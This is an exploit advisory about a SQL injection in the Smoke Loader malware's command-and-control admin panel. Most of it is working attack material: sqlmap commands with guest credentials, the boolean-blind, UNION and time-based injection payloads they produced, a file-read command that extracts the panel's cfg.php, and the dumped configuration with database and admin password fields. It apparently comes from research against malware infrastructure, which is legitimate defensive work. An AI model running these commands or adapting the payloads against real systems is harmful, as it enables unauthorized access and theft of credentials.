Smoke Loader SQL Injection

Credit: Ian
Risk: Medium
Local: No
Remote: Yes

Like other http-based exploit kits, I've discovered that the smoke loader malware downloader has a sql injection in its C&C administration panel that can be used to revel the administrator's password. sqlmap can identify the vulnerable parameter with the string: root@localhoost:/opt/pentest/database/sqlmap# ./ -u --auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk 3 sqlmap identified the following injection points with a total of 278 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE or HAVING clause (RLIKE) Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL RLIKE IF(2984=2984,0x4d7953514c,0x28) Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a71616c3a,0x467173496b71686b617a,0x3a7269703a),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL AND SLEEP(5) Then: root@localhoost:/opt/pentest/database/sqlmap# ./ -u --auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk 3 --file-read=[smoke root directory--can be found by sql errors on guest panel by replacing the above parameters with invalid data]/admin/inc/cfg.php root@localhoost:/opt/pentest/database/sqlmap# cat output/localhost/files/_var_www_smoke_admin_inc_cfg.php <?php $config["admin"] = "bla"; //admin login name $config["pass"] = "blabla"; //admin password $config["guest"] = "guest"; //admin login name $config["gpass"] = "guest"; //admin password $config["dbhost"] = "localhost"; $config["dbname"] = "smoke"; //mysql database name $config["dbuser"] = "bla"; //mysql database username $config["dbpass"] = "meh"; //mysql databse password $config["interval"] = 600; //interval for check online bots $OS = array ( 0 => "Windows XP", 1 => "Windows 2003", 2 => "Windows Vista", 3 => "Windows 7", 4 => "Other" ); ?>

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